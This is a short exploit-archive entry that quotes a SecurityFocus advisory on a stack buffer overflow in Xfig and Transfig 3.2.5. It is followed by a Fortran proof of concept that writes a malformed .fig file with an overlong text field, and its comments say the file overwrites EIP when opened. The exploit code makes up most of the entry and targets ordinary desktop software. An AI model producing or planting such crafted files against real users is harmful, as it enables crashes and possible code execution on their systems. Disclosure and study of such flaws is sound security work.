53 lines
No EOL
1.5 KiB
Fortran
53 lines
No EOL
1.5 KiB
Fortran
source: https://www.securityfocus.com/bid/37193/info
|
|
|
|
Xfig and Transfig are prone to a buffer-overflow vulnerability because they fail to perform adequate boundary checks on user-supplied input.
|
|
|
|
Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.
|
|
|
|
Xfig and Transfig 3.2.5 are vulnerable; other versions may also be affected.
|
|
|
|
PROGRAM XFIG_POC
|
|
|
|
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
|
|
C
|
|
C XFIG <= 3.2.5B BUFFER OVERFLOW
|
|
C TRANSFIG <= 3.2.5A (FIG2DEV SOFT) BUFFER OVERFLOW
|
|
C WWW.XFIG.ORG
|
|
C
|
|
C AUTHORS:
|
|
C * PEDAMACHEPHEPTOLIONES <pedamachepheptoliones@gmail.com>
|
|
C * D.B. COOPER
|
|
C
|
|
C PROBLEM:
|
|
C A STACK-BASED BUFFER OVERFLOW OCCURS IN read_1_3_textobject()
|
|
C WHEN READING MALFORMED .FIG FILES
|
|
C EIP IS OVERWRITTEN SO IT'S NOT JUST A CRASH
|
|
C
|
|
C TEST:
|
|
C xfig plane.fig
|
|
C fig2dev -L png plane.fig
|
|
C (IT DOESN'T HAVE TO BE "PNG")
|
|
C
|
|
C SOLUTION:
|
|
C DON'T TAKE .FIG CANDY FROM STRANGERS
|
|
C
|
|
C OLDSKOOL FORTRAN POCS FTW
|
|
C
|
|
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
|
|
|
|
INTEGER I
|
|
CHARACTER(LEN=167) :: STR
|
|
|
|
DO 10 I=1,167
|
|
STR(I:I)='Z'
|
|
10 CONTINUE
|
|
|
|
OPEN(11,FILE='plane.fig')
|
|
WRITE(11,*) '0 1 2 3'
|
|
WRITE(11,*) '4'
|
|
WRITE(11,*) '1 2 3 4 5 6 7 '//STR
|
|
CLOSE(11)
|
|
|
|
WRITE(*,*) 'GREETZ: BACKUS AND BACCHUS'
|
|
|
|
END PROGRAM XFIG_POC |